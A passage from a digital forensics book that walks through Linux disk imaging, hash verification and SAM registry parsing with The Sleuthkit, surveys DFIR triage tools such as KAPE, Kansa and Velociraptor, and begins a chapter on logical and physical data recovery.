a pinch, particularly because it will be available on just about any Unix or Linux system you might
come across.
Variants of dd include dc3dd and dcfldd. These are both forks of dd that were coded specifically
with digital forensics and media acquisition in mind. Both include logging and built-in hashing
capabilities with multiple available hash algorithms. There are also options to directly split the output
files for easier handling.
Command line imaging tools like dd and those based on it can seem a bit confusing to use at first, but
they all follow the same basic command layout. In simplest terms, you have an input file defined
by if=/dev/<device>. This is our subject media - the media we are imaging and will eventually
examine.
The output file - the image file we are writing to, is defined with of=<imagefile>. The file name
is arbitrary, but the general convention is to use a .dd or .raw extension for images created
with dd. The forensic-specific versions of dd extend the options. Using dc3dd as an example, the
output file can be defined with hof=<imagefile> hash=<algorithm> to specify hashing the input
media and the resulting image. An examiner can also split the output into smaller segments using
ofs=<imagefile> ofsz=<size>. Combining the options gives a split file with all the segments and the
original media hashed using hofs=<imagefile> hash=<algorithm> ofsz=<size>. The entire output
can be documented with the log=<logfile> option. We will see an example of this in the scenario
in the next section.
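In the meantime, put together, a hashed, logged, and split acquisition might look like the following sketch (device, file names, and segment size are illustrative; dc3dd expects the numeric segment pattern as part of the output name):

$ # device, file names, and segment size are illustrative
$ sudo dc3dd if=/dev/sdb hofs=image.raw.000 ofsz=2G hash=sha1 log=image.log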
Learning how to image with Linux command line tools is a useful skill for all digital forensic
practitioners. Using Linux bootable media to access in-situ media is not uncommon.
Evidence Integrity
In general, command line collection of a forensic image should include calculation of a hash prior to
imaging. This is usually followed by a hash of the resulting forensic image. In recent years, industry
practitioners have taken to relying on the built-in hashing capabilities of their imaging tools to do
the work for them. Manual hashing is both a good idea and a good skill to have.
The algorithm you select to hash with (MD5, SHA1, etc.) will be determined by your organization’s
policies and the standards you are working under. Issues surrounding hash algorithm selection are
outside the scope of this chapter.
Manually hashing media and files under Linux (or other command line environments for that matter)
is quite simple:
$ sudo sha1sum /dev/sdb
8f37a4c0112ebe7375352413ff387309b80a2ddd /dev/sdb
Where /dev/sdb is the subject storage media. With the hash of the original media recorded, we can use dd to create a simple raw image:
$ sudo dd if=/dev/sdb of=imagefile.raw
Now hash the resulting image file and make sure the hash matches that of the original media
(/dev/sdb). This means our image file is an exact duplicate, bit for bit, of the original.
$ sha1sum imagefile.raw
8f37a4c0112ebe7375352413ff387309b80a2ddd imagefile.raw
Volume / File system analysis
Once we have an image and the integrity of our evidence has been verified, we need to focus our
examination on the volume, file system, and artifacts pertinent to our case. This will include parsing
any partition table (DOS or GPT in most cases), identifying the file system format (exFAT, NTFS,
APFS, etc.), and finally identifying files or objects that need to be recovered, extracted, or examined
for the investigation.
The Sleuthkit (TSK)²³¹ is a collection of command line tools and libraries that can provide this
functionality under Linux. Bootable distributions focused on digital forensics like Kali and Caine
come with TSK by default. It can also be used on Windows and Mac systems. For a quick peek into
an image file, it can be quite useful. No need to fire up a full GUI tool to do a quick file extraction
or view the contents of a directory.
The Sleuthkit supports the following file system types:
• ntfs (NTFS)
• fat (FAT (Auto Detection))
• ext (ExtX (Auto Detection))
• iso9660 (ISO9660 CD)
• hfs (HFS+ (Auto Detection))
• yaffs2 (YAFFS2)
• apfs (APFS)
• ufs (UFS (Auto Detection))
• raw (Raw Data)
• swap (Swap Space)
• fat12 (FAT12)
• fat16 (FAT16)
• fat32 (FAT32)
• exfat (exFAT)
• ext2 (Ext2)
• ext3 (Ext3)
• ext4 (Ext4)
• ufs1 (UFS1)
• ufs2 (UFS2)
• hfsp (HFS+)
• hfsl (HFS (Legacy))
²³¹https://sleuthkit.org/
There are more than thirty command line tools in the TSK. We will use some of them in the sample
scenario that follows this section:
Tool Purpose
mmls list partitions
fsstat file system information
fls list files
istat file meta-data information (MFT entry, inode, etc.)
icat recover file content
Again, for a more detailed look at The Sleuthkit refer to the LinuxLEO Guide²³² for hands-on
exercises and practice images.
Artifact analysis
Digital forensics is far more than just recovering deleted files. There are databases to parse, temporal
data to extract and organize, and other artifacts to review and make sense of. Operating system
changes, application version changes, and various format changes make keeping our knowledge up
to date a challenging prospect.
Luckily, there are a great many open source projects that specifically address the collection and
analysis of everything from macOS plists to Windows shellbags. Using them might not be as simple
as clicking a line item in a GUI forensic suite or selecting a specific view in a menu. But again, the
open source tools very often provide a simple command line interface with an uncluttered look
at the data we need most. In addition, many of these tools provide libraries to allow developers to
include artifact parsing capabilities in more feature-rich tools. One example of this is Autopsy, a GUI
digital forensic tool that utilizes Sleuthkit libraries to parse disk images, storage volumes, and file
systems. Additional functionality is provided by external open-source libraries for artifact parsing
and timeline creation.
For those examiners that are proficient in the Python language, there are often specific Python
libraries that can be used to parse artifacts. In some cases, the previously mentioned open source
libraries will include bindings that provide Python code allowing us to write scripts that can parse
artifacts of interest.
One example of this is the libewf²³³ project. This library provides access to Expert Witness Format
(EWF) images created by many acquisition utilities. The project includes tools like ewfacquire,
ewfmount and ewfinfo to acquire and directly interact with common .E01 images. In addition to
the tools, there are also libraries that can be included in other programs to provide access to EWF
images. The Sleuthkit can be compiled with libewf support, allowing TSK tools to be used directly
on .E01 images without first having to convert them to “raw” format. Finally, pyewf Python bindings
are provided to allow anyone to create scripts using libewf functionality.
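For instance, the acquisition and media metadata stored in an E01 image can be reviewed directly with ewfinfo (the image name is illustrative):

$ # image name is illustrative
$ ewfinfo evidence.E01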
²³²https://linuxleo.com
²³³https://github.com/libyal/libewf
For operating system artifacts, this same approach is found in other libraries like libevtx²³⁴ for
Windows event logs, libregf²³⁵ for Windows registry hives, libscca²³⁶ for Windows prefetch files,
and many others. These are all part of the libyal²³⁷ project. These are not the only application-level
artifact tools and libraries out there, but they can give an idea of what is available.
Tools on the Linux command line are, of course, not limited to computer storage media either. There
are libraries and tools for mobile device analysis as well, such as libimobiledevice²³⁸ for iOS devices.
Application data from mobile devices is often stored in SQLite database files. Database clients included with many Linux distributions can often extract the desired data from chat apps, location-based artifacts, and more, as sketched below.
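As a sketch (the database, table, and column names here are hypothetical - inspect the actual schema first with the .tables and .schema commands), pulling recent messages from a chat database might look like this:

$ # table and column names are hypothetical; check the schema first
$ sqlite3 chat.db "SELECT datetime(timestamp, 'unixepoch'), sender, message FROM messages ORDER BY timestamp DESC LIMIT 5;"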
So what does all this look like in use?
²³⁴https://github.com/libyal/libevtx
²³⁵https://github.com/libyal/libregf
²³⁶https://github.com/libyal/libscca
²³⁷https://github.com/libyal
²³⁸https://libimobiledevice.org/
Sample Scenario: Define the Goal of the Examination
An important part of every digital forensic analysis is defining the goal or at least the scope of your
examination. Focusing on a goal helps us identify the tools required and the methods we should use.
When we provide forensic support to other investigators, the goal of the examination is typically
defined by the support request. In other cases, the elements of the crime or known indicators (in the
case of network compromise) provide the goals.
In this particular exercise, we will go back to our premise of cross verification. Covering every step
in exact detail is outside the scope of this chapter. This is an illustration of what a simple cross-
verification of results might look like.
Let us assume we have output from a Windows forensic suite that shows a particular user's last login to a Windows workstation at a given time. This was done through examination of the Security Account Manager (SAM) registry file. The specific time the user logged in is critical to the case, and we want to cross-verify the results. Our original output shows this:
Username : johnnyFox [1000]
Full Name :
User Comment :
Account Type : Default Admin User
Account Created : Thu Apr 6 01:35:32 2017 Z
Name :
Password Hint : InitialsInCapsCountToFour
Last Login Date : Sun Apr 30 21:23:09 2017 Z
Pwd Reset Date : Thu Apr 6 01:35:34 2017 Z
Pwd Fail Date : Sun Apr 30 21:23:01 2017 Z
Login Count : 7
The goal for this examination is to verify the above Last Login Date with a separate tool under Linux
(our cross verification).
Sample Scenario: Acquire the Evidence
In this scenario, we can assume the evidence has already been acquired. But for the sake of
illustration, we will show the disk image being created from computer media attached to our Linux
platform.
Linux assigns a device node to attached media. In this case, the device node is /dev/sdb. The
command lsblk will list all the block devices (storage media) attached to our system:
$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
...
sdb 7:0 0 500M 1 disk
└─sdb1 259:4 0 499M 1 part
...
Once we’ve identified the device, we can image it with dd or preferably a more forensic-oriented
version like dc3dd:
$ sudo dc3dd if=/dev/sdb hof=image.raw hash=sha1 log=image.log
This is a simple forensic image obtained with Linux using dc3dd on a subject disk. The input file
(if) is /dev/sdb. The hashed output file (hof) is image.raw. The hash algorithm is SHA1 and we are
writing a log file to image.log.
The log file created above is viewable using the cat command to stream the text file to our terminal:
$ cat image.log
dc3dd 7.2.646 started at 2022-07-27 21:33:40 -0400
compiled options:
command line: dc3dd if=/dev/sdb hof=image.raw hash=sha1 log=image.log
device size: 1024000 sectors (probed), 524,288,000 bytes
sector size: 512 bytes (probed)
524288000 bytes ( 500 M ) copied ( 100% ), 2 s, 237 M/s
524288000 bytes ( 500 M ) hashed ( 100% ), 1 s, 555 M/s
input results for device `/dev/sdb':
1024000 sectors in
0 bad sectors replaced by zeros
094123df4792b18a1f0f64f1e2fc609028695f85 (sha1)
output results for file `image.raw':
1024000 sectors out
[ok] 094123df4792b18a1f0f64f1e2fc609028695f85 (sha1)
dc3dd completed at 2022-07-27 21:33:42 -0400
This shows us a log of the imaging process, the size of the data acquired, and the calculated hashes
used to help document evidence integrity.
We now have a verified image, obtained from the original storage device, that we can use for our
examination.
Sample Scenario: Map the Storage Volumes
Once we have created our image, we need to determine the partitioning scheme, and which of those
partitions are of interest to our investigation.
$ mmls image.raw
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors
Slot Start End Length Description
000: Meta 0000000000 0000000000 0000000001 Primary Table (#0)
001: ------- 0000000000 0000002047 0000002048 Unallocated
002: 000:000 0000002048 0001023999 0001021952 NTFS / exFAT (0x07)
Using the mmls command from the Sleuthkit, we can see that there is only one NTFS file system, at
a sector offset of 2048 (under Start). We will be using the additional file system and file extraction
tools from TSK, and the sector offset is an important value. We use it to tell TSK which volume to
access inside the image. Media storage partitioning can be quite complex, and with TSK we access
each volume/file system separately.
Sample Scenario: Identify the File System
Our volume of interest has been identified at an offset inside the image of 2048 sectors. We pass this
volume to the TSK tool fsstat to obtain detailed information on the file system:
$ fsstat -o 2048 image.raw
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: NTFS
Volume Serial Number: CAE0DFD2E0DFC2BD
OEM Name: NTFS
Volume Name: NTFS_2017d
Version: Windows XP
METADATA INFORMATION
--------------------------------------------
First Cluster of MFT: 42581
First Cluster of MFT Mirror: 2
Size of MFT Entries: 1024 bytes
Size of Index Records: 4096 bytes
Range: 0 - 293
Root Directory: 5
CONTENT INFORMATION
--------------------------------------------
Sector Size: 512
Cluster Size: 4096
Total Cluster Range: 0 - 127742
Total Sector Range: 0 - 1021950
$AttrDef Attribute Values:
$STANDARD_INFORMATION (16) Size: 48-72 Flags: Resident
$ATTRIBUTE_LIST (32) Size: No Limit Flags: Non-resident
$FILE_NAME (48) Size: 68-578 Flags: Resident,Index
$OBJECT_ID (64) Size: 0-256 Flags: Resident
$SECURITY_DESCRIPTOR (80) Size: No Limit Flags: Non-resident
$VOLUME_NAME (96) Size: 2-256 Flags: Resident
$VOLUME_INFORMATION (112) Size: 12-12 Flags: Resident
$DATA (128) Size: No Limit Flags:
$INDEX_ROOT (144) Size: No Limit Flags: Resident
$INDEX_ALLOCATION (160) Size: No Limit Flags: Non-resident
$BITMAP (176) Size: No Limit Flags: Non-resident
$REPARSE_POINT (192) Size: 0-16384 Flags: Non-resident
$EA_INFORMATION (208) Size: 8-8 Flags: Resident
$EA (224) Size: 0-65536 Flags:
$LOGGED_UTILITY_STREAM (256) Size: 0-65536 Flags: Non-resident
There is quite a bit of information in the fsstat output. File system type, version, and volume name
are all items we will want to know for our notes. Other information provided by fsstat can be
useful for documenting and describing files carved from this particular volume, as well as ranges of
physical blocks used to store data.
Sample Scenario: Identify the File(s) of Interest
In this particular scenario, we are conducting a cross-verification of findings from a file we
already know - the SAM registry file. In a normal Windows installation, the SAM is located in
C:\Windows\System32\config. We can use the Sleuthkit fls tool to recursively list all the allocated
files in the volume of interest and specifically look, or grep, for Windows/System32/config/SAM:
$ fls -Fr -o 2048 image.raw | grep -i system32/config/SAM
r/r 178-128-2: Windows/System32/config/SAM
This output gives us the NTFS file system’s Master File Table or MFT entry for the SAM file. In this
case, the MFT entry is 178-128-2.
Sample Scenario: Extract the data
We will do two quick steps here. First, we will extract the file using the Sleuthkit’s icat command,
which takes the meta-data entry (in this case MFT entry 178), and streams the contents of the data
blocks or clusters to our chosen destination (in this case, an extracted file):
$ icat -o 2048 image.raw 178 > image.SAM
$ file image.SAM
image.SAM: MS Windows registry file, NT/2000 or above
The icat command extracts the SAM file and writes it to the file called image.SAM (arbitrarily named).
Once this is done, we use the Linux file command to make sure that the file type we’ve extracted
matches what we expect. In this case, we expected a Windows registry file, and that’s exactly what
we have.
At this point, we can install libregf. This will allow us to gather some simple identifying information
as well as mount the registry file to allow us to parse it for the information we are seeking. The
following commands are provided by the libregf package:
$ regfinfo image.SAM
regfinfo 20220131
Windows NT Registry File information:
Version: 1.3
File type: Registry
$ mkdir regfmnt
$ regfmount image.SAM regfmnt/
regfmount 20220131
Using commands provided by libregf we confirm the identity and version of the registry file. Then
we create a mount point or directory to which we can attach the registry file so we can browse the
contents.
Sample Scenario: Parse the Artifact
Given the fact that we’ve already examined this file in our main forensic suite, and we are simply
cross-verifying our results here, we would probably know the account’s Relative ID (RID) - in this
case, the account’s RID is 1000.
Now that we know the RID (from our previous examination - this is a cross verification), we can
browse to the account’s associated keys in the mounted registry file:
$ cd SAM/Domains/Account/Users/
$ ls
(values)/ 000001F4/ 000001F5/ 000003E8/ 000003E9/ Names/
The directory SAM/Domains/Account/Users/ contains keys for each account, listed by RID in hex
format. If you study Windows forensics, you know that we have a System Administrator (RID 500),
a Guest account (RID 501), and user accounts starting at 1000 by default. We can confirm the account
we are interested in is 000003E8 by converting each value to decimal using shell expansion and
finding 1000:
$ echo $((0x3E8))
1000
Changing into that directory, we find several subkey values. Again, studying registry forensics, we
find that the F value contains an account’s login information, so we change our directory to (values)
for that account:
$ cd 000003E8/(values)
$ ls
F UserPasswordHint V
There are three values listed, including F.
Sample Scenario: Cross Verify the Findings
Using a hex viewer included with Linux (xxd), we can look at the subkey’s value. The Last Login
Date is stored at hex offset 8.
$ xxd F
00000000: 0200 0100 0000 0000 678E 5DF7 F7C1 D201 ........g.].....
00000010: 0000 0000 0000 0000 20D7 BF15 76AE D201 ........ ...v...
00000020: FFFF FFFF FFFF FF7F 5CE9 5DF2 F7C1 D201 ........\.].....
00000030: E803 0000 0102 0000 1402 0000 0000 0000 ................
00000040: 0000 0700 0100 0000 0000 4876 488A 3600 ..........HvH.6.
Hex offset 8 in the above output is on the first line: 678E 5DF7 F7C1 D201.
There are a number of tools available to convert that hex string to a date value. We will use a simple
python script (WinTime.py²³⁹).
$ python ~/WinTime.py 678e5df7f7c1d201
Sun Apr 30 21:23:09 2017
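If the helper script is not at hand, the same conversion can be sketched with a Python one-liner, since a Windows FILETIME is a little-endian count of 100-nanosecond intervals since 1601-01-01 UTC:

$ # same 8 bytes read at offset 8 of the F value
$ python3 -c "from datetime import datetime, timedelta; print(datetime(1601, 1, 1) + timedelta(microseconds=int.from_bytes(bytes.fromhex('678e5df7f7c1d201'), 'little') // 10))"
2017-04-30 21:23:09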
Here again is the original output from the analysis we are trying to verify (with some output
removed for brevity):
...
Last Login Date : **Sun Apr 30 21:23:09 2017 Z**
...
So we can see that our original analysis, using a common digital forensics tool under Windows, has
been cross verified with a completely separate set of tools under a different operating system. A far
more detailed look at this level of analysis is covered in the aforementioned LinuxLEO guide.
Note that we included the acquisition here for completeness, but in a real cross-verification situation,
the image already acquired is fine to use - it has generally already been verified by hashing.
We’ve actually accomplished a bit more by verifying our results with Linux. In addition to proving
the veracity of what our original tool found, we have focused on a “smoking gun” artifact and
manually extracted and parsed it ourselves. This entire manual process will go in your notes along
with any research you needed to do in order to complete it (What registry file do I need? Where is
the login data stored? What offset? What format?). Should you ever be called to testify or participate
in any adjudication process, you will be better prepared to answer the opposition’s questions on how
your original tool found what it reported.
This same approach applies to the results of a mobile device analysis. In many mobile device analysis
suites, chats are displayed in a GUI tool and organized by conversation. Find something important to
²³⁹https://linuxleo.com/Files/WinTime
the investigation? Fire up a Linux command line and dig into the database yourself. In many cases,
you don’t even need to leave your Windows forensic workstation desktop. You can use WSL/WSL2,
or SSH into your physical Linux workstation or VM using PuTTY²⁴⁰.
²⁴⁰https://putty.org
Closing
While doing all this on the command line looks daunting, it is an excellent way to drill down to
the “bits and bytes” and learn digital forensics from the ground up. There is no doubt that a full
GUI suite of digital forensic tools can be a more efficient way of drilling into large amounts of data
quickly. Where the Linux command line excels is in forcing you to learn exactly where you need to
look for specific data and how it is stored.
There are a growing number of ways to access a Linux environment without the need for excessive
resources. Linux and its powerful tools are increasingly accessible to forensic examiners and
modern digital forensic laboratories.
Chapter 11 - Scaling, scaling, scaling, a tale of DFIR Triage
By Guus Beckers²⁴¹ | LinkedIn²⁴²
What is triage?
While full disk analysis certainly has its place, triage is an essential part of digital forensics. The purpose of triage is twofold: to cut down on the noise generated by the multitude of events on a host, and to determine if deep-dive forensics is required. As time and computing power are precious resources, it is best not to waste them. Luckily, there are a couple of concepts and tools that can help an investigator out at any level of the investigation.
What should be included in a triage?
Before getting into the nitty gritty with tools, let's examine what is useful to include within a triage for the majority of cases. If a specific case deals with investigating well-known artifacts, do not hesitate to add them to your list of triage items. It is advisable to collect multiple sources of each evidence type to get a thorough understanding of the case at hand; sometimes evidence will not be available within all data structures due to the specific behavior of the operating system, while at other times an adversary might have deleted one of the available sources. Without further ado, let's take a look at the list:
²⁴¹http://discordapp.com/users/323054846431199232
²⁴²https://www.linkedin.com/in/guusbeckers/
• Artifacts that keep track of the locations of files on the disk or in a file manager, and any performed actions (renaming/deleting); this can be the $MFT or a list of locations that have been accessed.
• Artifacts that track the history of the files contained within a folder.
• Any hibernation or swap files that have been written to disk; these particular artifacts can extend your window into the past by days or even weeks.
• Artifacts that indicate account usage, modification or deletion.
• Artifacts that can clarify which applications have been installed or uninstalled at a particular
date.
• Artifacts which can be used to prove application execution in the past.
• Artifacts which can track network or data transfer by a particular process.
• Any available web browser history and a record of auxiliary actions such as initiated
downloads.
• Artifacts which track external events such as plugging in USB drives and/or other devices.
• Any available event logs that have been maintained by the operating system or relevant
applications.
• Records of admin level activities on a system.
These artifacts can be used for initial analysis while further processing of a case takes place.
Forensic triage of one or a limited amount of hosts
Historically, to examine a computer, an investigator would manually collect all artifacts and go through them one by one. You would need to know the artifact, go to the folder containing the artifact, export it, and repeat the process for any relevant artifact. To say this requires a large time investment is an understatement. A few years ago, KAPE was introduced to the forensic community.
It is a standalone executable that contains a wealth of forensic knowledge on where artifacts live on
a computer (knowledge you can extend by collaborating on the public GitHub). KAPE contains a
set of definitions called Targets. A Target defines where an artifact lives on a system. Collecting it is
as easy as ticking a checkbox. Targets can also contain other Targets. In this manner, KAPE offers
various triage Targets, thereby allowing an investigator to perform triage of an entire host just by
selecting a single Target. The Target collection can also be automated on endpoints by utilizing its
command line counterpart.
The second part of KAPE covers analysis through definitions called Modules. A Module can comb
through data collected by a Target and transform it to a file format that’s easy to ingest in other
tools. It does this by interacting with third-party tools that are part of a Module. Any executable
that uses a command line is a viable option. As an example, KAPE comes with the entire suite of
forensic parsers by Eric Zimmerman (for an entire list check here²⁴³), which cover the most popular
Windows forensic artifacts.
²⁴³https://ericzimmerman.github.io/
Of particular note for triage is the KapeTriage Target²⁴⁴. The following description is provided at the
time of writing:
KapeTriage collections will collect most of the files needed for a DFIR Investigation. This Target pulls evidence from File System files, Registry Hives, Event Logs, Scheduled Tasks, Evidence of Execution, SRUM data, SUM data, Web Browser data (IE/Edge, Chrome, Firefox, etc), LNK Files, Jump Lists, 3rd party remote access software logs, antivirus logs, Windows 10 Timeline database, and $I Recycle Bin data files.
The KapeTriage collection can be post-processed using the !EZParser Module²⁴⁵. These parsers, also
written by Eric Zimmerman, can be used to extract information from the most common artifacts.
Data will be made available in CSV format.
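As a sketch (drive letters and paths are placeholders; consult the KAPE documentation for the full option set), a combined collection and post-processing run from the command line might look like this:

PS> # drive letters and paths are placeholders
PS> .\kape.exe --tsource C: --tdest D:\Triage --target KapeTriage --module !EZParser --mdest D:\TriageParsed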
These parsers (and other tools) can also be downloaded individually here²⁴⁶. Among the tools is
Timeline Explorer, which is a utility that can open CSV files and has robust search and sorting
options. A description and demonstration of Timeline Explorer is available at AboutDFIR²⁴⁷.
KAPE can be used during live investigations but also after a forensic image has been created. A
recommended tool to use with KAPE is Arsenal Image Mounter. Among its capabilities is read-only
and write-protected image mounting. Just point KAPE at the assigned drive letter and it can perform
collection and analysis.
Utilizing KAPE, collection and transformation of artifacts is brought down to a matter of minutes.
This allows an investigator to perform triage to determine if a deep-dive is required or perform triage
while other forensic evidence is still processing.
Another possibility when dealing with a single host is creating a custom content image using FTK
Imager. You will be able to manually select the artifacts you want to collect using a graphical
interface. Richard Davis covers this extensively in a video of his 13Cubed digital forensics YouTube
series. It can be found here²⁴⁸.
macOS and Linux
Tools similar to KAPE exist for other operating systems as well. One of the tools that deals exclusively
with macOS (and its mobile counterparts iOS and iPadOS) is mac_apt²⁴⁹. It can extract a wealth of
information from a macOS system and can deal with a variety of images and acquired data. mac_apt
can be used exclusively on forensic images. Fortunately, there exists a live response counterpart.
Named the Unix Artifact Collector²⁵⁰ (or UAC for short), it can acquire data from both macOS and
a range of Linux distributions. Both tools are open-source and any contribution is welcomed.
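As an illustration (the profile name and output directory are illustrative; check the UAC documentation for the available profiles), a live collection with UAC might look like this:

$ # profile and destination are illustrative
$ sudo ./uac -p ir_triage /tmp/collection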
²⁴⁴https://github.com/EricZimmerman/KapeFiles/blob/master/Targets/Compound/KapeTriage.tkape
²⁴⁵https://github.com/EricZimmerman/KapeFiles/blob/master/Modules/Compound/!EZParser.mkape
²⁴⁶https://ericzimmerman.github.io/#!index.md
²⁴⁷https://aboutdfir.com/toolsandartifacts/windows/timeline-explorer/
²⁴⁸https://www.youtube.com/watch?v=43D18t7l7BI
²⁴⁹https://github.com/ydkhatri/mac_apt
²⁵⁰https://github.com/tclahr/uac
Scaling up to a medium-sized subnet
The aforementioned tools work fantastically on a single host, but how can we scale this to a subnet? The Kansa PowerShell IR Framework was created by Dave Hull to address a growing need in the DFIR community: determining where deep-dive forensics should take place in ever-expanding networks.
To do this, Kansa operates on two assumptions: malware needs to be present on the machine to perform its actions, and malicious activity is relatively rare and therefore automatically stands out. To accomplish this, Kansa is made up of two distinct components.
The collection component is able to collect a number of lightweight artifacts including autostart locations, services, new admin users, etc. The type of artifact is determined by a PowerShell script; each artifact uses its own script. These scripts are tied together with a Kansa master script, which is used to set which evidence needs to be collected. The Kansa scripts need to be executed on each server where evidence needs to be collected; to facilitate a secure transfer of credentials, Kansa uses PowerShell remoting. Kansa also integrates with third-party executables. Any required executable can automatically be pushed to the various servers.
The second component is analysis with Kansa. These scripts stack the output of each gathered evidence item and count the occurrences of each item. In this manner, outliers become more easily visible.
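As a sketch (the host list path and options are illustrative; see the Kansa documentation for the full parameter set), a collection run against a list of hosts might look like this:

PS> # host list and options are illustrative
PS> .\kansa.ps1 -TargetList .\hostlist.txt -Pushbin -Verbose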
A limitation of Kansa is that it uses persistent PowerShell connections until a script has been
completed. For this reason, it is not recommended to use Kansa for more than 100 hosts. A distributed
version of Kansa, developed by Jon Ketchum, addresses this limitation. The distributed version lifts
many of the limitations of the original version. Persistent connections are no longer required. Larger
data sets also require an optimized parsing method. For this reason the distributed version of Kansa
uses an ElasticSearch backend. You’re encouraged to check out the original²⁵¹ talk.
macOS and Linux don't have similar tools, but this shouldn't necessarily be a problem. Both operating systems have a long history of text manipulation tools like awk, grep, and uniq. Depending on the retrieved information, a combination of these tools can be used to achieve the same results, as sketched below.
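As a sketch (paths are hypothetical, with each host's collected output in its own directory), stacking service listings across hosts to surface rare entries could look like this:

$ # paths are hypothetical; rare (low-count) entries surface at the top
$ cat hosts/*/services.txt | sort | uniq -c | sort -n | head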
Scaling up to an entire network
Individual hosts and small networks have been discussed, but what are the options when you deal with a massive network? A single tool can be used in that instance. Velociraptor is another addition to the open-source DFIR arsenal. Upon its arrival in 2018 it quickly gathered a following, and it isn't difficult to see why. Velociraptor is one of the most powerful tools in the DFIR community. For starters, it supports all the major operating systems: Windows, macOS, and Linux alike. What makes Velociraptor stand out is its distributed computing model along with a client/server approach.
²⁵¹https://www.youtube.com/watch?v=ZyTbqpc7H-M
A Velociraptor instance consists of a server and a number of clients distributed through a (client) network. The agent creates a persistent connection to the server.
Analysts can use Velociraptor to:
• Retrieve any file on a connected endpoint in a forensically sound manner
• Retrieve forensic artifacts from all connected endpoints with the push of a button
• Scan for IOCs utilizing both regex and YARA rules
• Push and utilize third-party command line tools on all hosts running an agent
It is not possible to do Velociraptor justice within a short section of this chapter. Rather than describe it, it is advised to see the tool in action. Eric Capuano recently gave a rundown²⁵² on Velociraptor using a small network. Furthermore, Michael Cohen also developed his own tutorial series, which is currently available free of charge at this link²⁵³.
Other tools
A number of other triage tools aren’t discussed in depth but are still quite useful while performing
triage. They can either be used on a standalone basis or pushed by Velociraptor. Be aware that these
tools might set off AV due to their included malware signatures.
• Autoruns²⁵⁴ or its CLI version Autorunsc, useful for enumerating all ASEP locations on a host
• DeepBlueCLI²⁵⁵, a tool which enables threat hunting using the Windows Event logs
• Chainsaw²⁵⁶, a similar tool which can group significant events
• Loki²⁵⁷, an IOC/Yara scanner which can enumerate known malicious files on a host
• Hayabusa²⁵⁸, an expansive threat hunting scanner which offers timelining capabilities
Practicing triage
Triage can be practiced on any number of forensic disk images. The following community images
are included as recommendations:
• DFIR Madness - The case of the stolen Szechuan sauce²⁵⁹
• Digital Corpora - 2012 National Gallery DC Scenario²⁶⁰
• Digital Corpora - 2019 Narcos Scenario²⁶¹
• Cyberdefenders - Pawned DC²⁶²
²⁵²https://www.youtube.com/watch?v=Q1IoGX--814
²⁵³https://docs.velociraptor.app/training/
²⁵⁴https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
²⁵⁵https://github.com/sans-blue-team/DeepBlueCLI
²⁵⁶https://github.com/WithSecureLabs/chainsaw
²⁵⁷https://github.com/Neo23x0/Loki
²⁵⁸https://github.com/Yamato-Security/hayabusa
²⁵⁹https://dfirmadness.com/the-stolen-szechuan-sauce/
²⁶⁰https://digitalcorpora.org/corpora/scenarios/national-gallery-dc-2012-attack/
²⁶¹https://digitalcorpora.org/corpora/scenarios/2019-narcos/
²⁶²https://cyberdefenders.org/blueteam-ctf-challenges/89
Contributions and sources
Forensic triage, perhaps more than any other aspect of forensics, relies on the input of the entire community. Without the aid of the developers in this section, triage would surely be more difficult.
• Eric Zimmerman for creating the variety of parsers and KAPE.
• Andrew Rathbun for creating a multitude of KAPE Targets.
• Yogesh Khatri for creating the mac_apt acquisition framework.
• Thiago Lahr for his development of UAC, the Unix-like Artifacts Collector.
• Dave Hull for creating Kansa and Jon Ketchum for extending the original suite with DistributedKansa.
• Michael Cohen for creating Velociraptor.
• Eric Conrad for his work on DeepBlueCLI.
• Nextron Systems for developing the Loki scanner.
• WithSecure Labs for developing the Chainsaw EVTX scanner.
• Yamato Security for creating the Hayabusa threat hunting scanner.
Information from the sources below was also used in creating this chapter:
• Richard Davis for creating the excellent 13Cubed YouTube series.
• Eric Capuano for demoing the powerful capabilities of Velociraptor.
Chapter 12 - Data recovery
By Mark B.²⁶³ | Website²⁶⁴ | Instagram²⁶⁵
Types of data recovery
When talking about data recovery, it is important to distinguish between:
• Logical data recovery
• Physical data recovery
Both topics will be covered in this chapter.
²⁶³https://opensource-data-recovery-tools.com/
²⁶⁴https://data-recovery-prague.com/
²⁶⁵https://www.instagram.com/disk.doctor.prague/
Logical data recovery
This is the type of data recovery offered by most forensic tools and a lot of specialized programs. A logical data recovery can mean:
• restoring deleted files,
• dealing with a damaged filesystem catalogue or
• repairing damaged files.
As good as forensic tools are for conducting an investigation, most fall very short when handling corrupted filesystems. On the other hand, there are really great logical recovery tools, including but not limited to:
• R-Studio²⁶⁶
• UFS-Explorer²⁶⁷
• DMDE²⁶⁸
These tools are able to handle even the most severely damaged filesystems very well. The problem from a forensics standpoint is the way such tools work: so-called data recovery programs analyse the whole drive and try to "puzzle" a filesystem together based on the data that was found.
That means that such a generated virtual filesystem is the tool's interpretation of the data. In some cases it would be very hard, or even impossible, to fully understand how the program arrived at the final result. As great as these tools are for recovering data and building a working folder tree from corrupted filesystems, they may not be ideal for forensics, as the processes which lead to the results are not always clear.
²⁶⁶https://r-studio.com
²⁶⁷https://www.ufsexplorer.com
²⁶⁸https://dmde.com
Physical data recovery
This category contains all kinds of cases - for example:
• unstable drives,
• damaged PCBs (printed circuit boards),
• firmware issues,
• heads stuck on the platters,
• broken motors,
• broken read/write heads and even
• damaged or dirty platters.
In the case of flash memory such as memory cards, pendrives or SSDs, there are just:
• electronic problems and
• firmware issues, which make up the majority of cases.
So, first of all, you need to decide how far it makes sense to go with data recovery when conducting a forensic investigation. I have thought about that for quite some time, and I think most forensic investigators will not want to build a fully-fledged data recovery operation, take up cleanroom data recovery or dive very deep into firmware repair. Generally speaking, most forensic investigators probably don't want to outsource the imaging of a drive to a data recovery lab just because Windows drops the drive once it becomes unstable.
I guess many will also want to handle a PCB swap without a data recovery lab.
That is for sure an individual decision, but going deeper into data recovery would need much more information than I could fit into one chapter. If you are interested in a detailed introduction to professional data recovery, I would recommend my book Getting started with professional data recovery²⁶⁹ (ISBN 979-8800488753).
With the above-mentioned use cases in mind, we can have a look at the right tools to fit that need. These are my preferences:
• Guardonix²⁷⁰
• RapidSpar²⁷¹
• DeepSpar Disk Imager²⁷²
²⁶⁹https://www.amazon.com/dp/B09XBHFNXZ/
²⁷⁰https://guardonix.com/
²⁷¹https://rapidspar.com/
²⁷²https://www.deepspar.com/products-ds-disk-imager.html
